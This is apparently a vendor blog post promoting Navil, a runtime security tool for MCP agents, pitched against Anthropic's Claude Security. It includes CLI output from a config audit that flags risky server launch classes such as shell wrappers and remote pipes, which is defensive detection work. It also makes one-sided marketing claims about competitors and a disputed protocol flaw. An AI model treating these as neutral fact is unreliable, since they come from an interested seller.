Claude Security is good. It's also not enough.

Anthropic shipped Claude Security in public beta on April 30. It's a real product, built on a real model (Opus 4.7), backed by real partners (CrowdStrike, Palo Alto, SentinelOne, Wiz, Trend Micro). It scans codebases, traces data flows, generates targeted patches. We've used it. It works.

It is also a static analysis tool. It runs against source code at rest. That's the whole product.

The question security teams are now being asked — by their own engineers, their own auditors, their own boards — is a different one: which of our agents are calling which tools in production right now, and what did they try that failed last week?

That's a runtime question. Static analysis doesn't answer it.

What Claude Security does not cover

We mapped the announcement against the agent attack surface. Three gaps stood out:

1. Runtime tool-call enforcement

Claude Security finds vulnerabilities in code. It doesn't observe what an agent is doing with that code at runtime. If your Cursor instance gets a poisoned response from an MCP server, Claude Security won't see it. The proxy layer between agent and tool — where every interesting decision happens — is empty.

2. Multi-vendor agent fleets

Anthropic also shipped Claude Managed Agents on April 9 — a hosted runtime with permission controls and tool-call tracing. The critical limitation: agents must run on Anthropic infrastructure. The 70% of enterprise agent traffic that comes from Cursor, Continue, custom internal agents, and non-Claude models is structurally out of scope for that product. It cannot ship cross-vendor; it's a Claude product by design.

3. The MCP STDIO transport flaw

In April 2026, researchers at Ox disclosed that the MCP STDIO transport executes arbitrary OS commands regardless of whether they spawn a valid MCP server. Roughly 200,000 servers are affected, totaling 150M+ downloads. Anthropic received the disclosure. They declined to patch the protocol, calling the behavior "expected." So this is now a runtime detection problem — there is no upstream fix coming.

What we shipped today

navil audit-deps --stdio-flaw

Local scan of every MCP config on your machine, flagging launch commands that match the STDIO flaw class — shell wrappers, unpinned npx, untrusted authors, remote pipes, unknown binaries. Pure-local, no network calls, finishes in under a second. Outputs a markdown report and structured JSON. Anthropic won't patch this; you can detect and mitigate it today.

$ navil audit-deps --stdio-flaw
✓ Configs scanned    : 3
✓ Servers examined   : 17
✓ Servers flagged    : 5
  SHELL_WRAPPER       : 2
  UNPINNED_NPX        : 2
  REMOTE_PIPE         : 1

navil policy generate

Reads your MCP configs and tool-call audit log, calls a reasoning model (default: Claude Sonnet 4.6; --engine=opus-4-7 available for deeper analysis) with the SAFE-MCP threat catalog as cached context, and produces:

1. A navil.yaml policy file with least-privilege scoping
2. A navil-policy.md rationale document — why each rule exists, what threat class it blocks, which SAFE-MCP tactic it maps to

The rationale doc is the differentiator. Generated policies nobody can defend in front of an auditor get rolled back. Generated policies with a paragraph of reasoning per rule survive review.

# One-time: provide your Anthropic key (the SDK ships with `pip install navil`)
$ export ANTHROPIC_API_KEY=sk-ant-...
 
# Generate
$ navil policy generate --engine=opus-4-7
  Policy written to:    navil.yaml
  Rationale written to: navil-policy.md

No key set? navil policy generate falls back to a deterministic rule-based generator that still produces a usable least-privilege policy from your MCP configs alone — without the per-rule reasoning paragraphs. The reasoning step is the upgrade, not the floor.

Why vendor-neutrality matters

Anthropic's products are excellent and they are Claude-only by definition. Wiz now has Opus 4.7 inside their platform; Wiz is a great product and it's CNAPP-only by definition. Snyk and Socket are great SCA products; they're file-system-and-package-manager-only.

The runtime governance layer for AI agents has to work across every model and every agent. A CISO who has to deploy four products to cover their fleet won't deploy any of them.

Navil is one product. It works with Claude Code, Cursor, Continue, OpenClaw, and custom agents that speak MCP. It works with any reasoning model the team prefers. The proxy is 2.7 microseconds at p50 in Rust. The catalog is open. The license is Apache 2.0.

pip install navil && navil secure

We'll keep shipping the runtime layer Anthropic structurally won't.

For the full ecosystem CVE data: State of MCP Security 2026. For the install guide: /docs/quickstart.